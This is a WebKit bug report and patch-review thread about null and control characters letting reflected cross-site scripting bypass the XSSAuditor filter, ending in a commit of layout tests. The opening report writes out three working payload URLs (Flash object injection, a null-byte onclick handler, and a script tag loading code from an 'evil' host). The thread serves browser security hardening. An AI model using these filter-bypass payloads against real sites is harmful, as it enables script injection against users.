Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to injected plugin-based objects, inline event handlers, and external scripts. Examples: Plugin-Injection: http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E Inline Event Handler: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E External Scripts: http://good.webblaze.org/dbates/xsstest.php?q=<script src='http://evil.webblaze.org/dbates/xss.js'></script>
Created attachment 32431 [details] Patch with tests
I patched this by telling XSSAuditor::findInRequest when to allow/disallow null and non-null control characters. I also changed the console message type in method XSSAuditor::canLoadObject from OtherMessageSource to JSMessageSource, since DumpRenderTree doesn't seem to dump n OtherMessageSource errors as needed by various plugin-based test cases. (In reply to comment #1) > Created an attachment (id=32431) [details] > Patch with tests
Created attachment 32433 [details] Patch with tests Forgot to put email address in change log for LayoutTests.
Comment on attachment 32433 [details] Patch with tests What is execGetURL.swf ? I don't think we can put flash movies in layout tests. This probably isn't needed because the auditor blocks the load anyway. Also, where is script-tag-post-control-char.html ?
Right. I just used it as a place holder for the plugin-based tests, but it isn't needed as you pointed out. I'll add such a test and post the patch again. (In reply to comment #4) > (From update of attachment 32433 [details]) > What is execGetURL.swf ? I don't think we can put flash movies in layout > tests. This probably isn't needed because the auditor blocks the load anyway. > Also, where is script-tag-post-control-char.html ?
Awesome. Thanks Dan.
Created attachment 32462 [details] Patch with tests Removed file execGetURL.swf. Added test case script-tag-post-control-char.html
Comment on attachment 32462 [details] Patch with tests This looks great. Thanks Dan. The ChangeLog still lists the SWF, but that's not a big deal. I'll try to remember to remove it when I land the patch.
Sending LayoutTests/ChangeLog Adding LayoutTests/http/tests/security/xssAuditor/anchor-url-dom-write-location-inline-event-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/anchor-url-dom-write-location-inline-event-null-char.html Adding LayoutTests/http/tests/security/xssAuditor/embed-tag-control-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/embed-tag-control-char.html Adding LayoutTests/http/tests/security/xssAuditor/embed-tag-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/embed-tag-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/embed-tag-null-char.html Adding LayoutTests/http/tests/security/xssAuditor/embed-tag.html Adding LayoutTests/http/tests/security/xssAuditor/link-onclick-control-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/link-onclick-control-char.html Adding LayoutTests/http/tests/security/xssAuditor/link-onclick-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/link-onclick-null-char.html Adding LayoutTests/http/tests/security/xssAuditor/object-embed-tag-control-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/object-embed-tag-control-char.html Adding LayoutTests/http/tests/security/xssAuditor/object-embed-tag-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/object-embed-tag-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/object-embed-tag-null-char.html Adding LayoutTests/http/tests/security/xssAuditor/object-embed-tag.html Adding LayoutTests/http/tests/security/xssAuditor/object-tag-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/object-tag.html Adding LayoutTests/http/tests/security/xssAuditor/script-tag-post-control-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/script-tag-post-control-char.html Adding LayoutTests/http/tests/security/xssAuditor/script-tag-post-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/script-tag-post-null-char.html Adding LayoutTests/http/tests/security/xssAuditor/script-tag-with-source-control-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/script-tag-with-source-control-char.html Adding LayoutTests/http/tests/security/xssAuditor/script-tag-with-source-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/script-tag-with-source-null-char.html Sending WebCore/ChangeLog Sending WebCore/page/XSSAuditor.cpp Sending WebCore/page/XSSAuditor.h Transmitting file data ................................ Committed revision 45639. http://trac.webkit.org/changeset/45639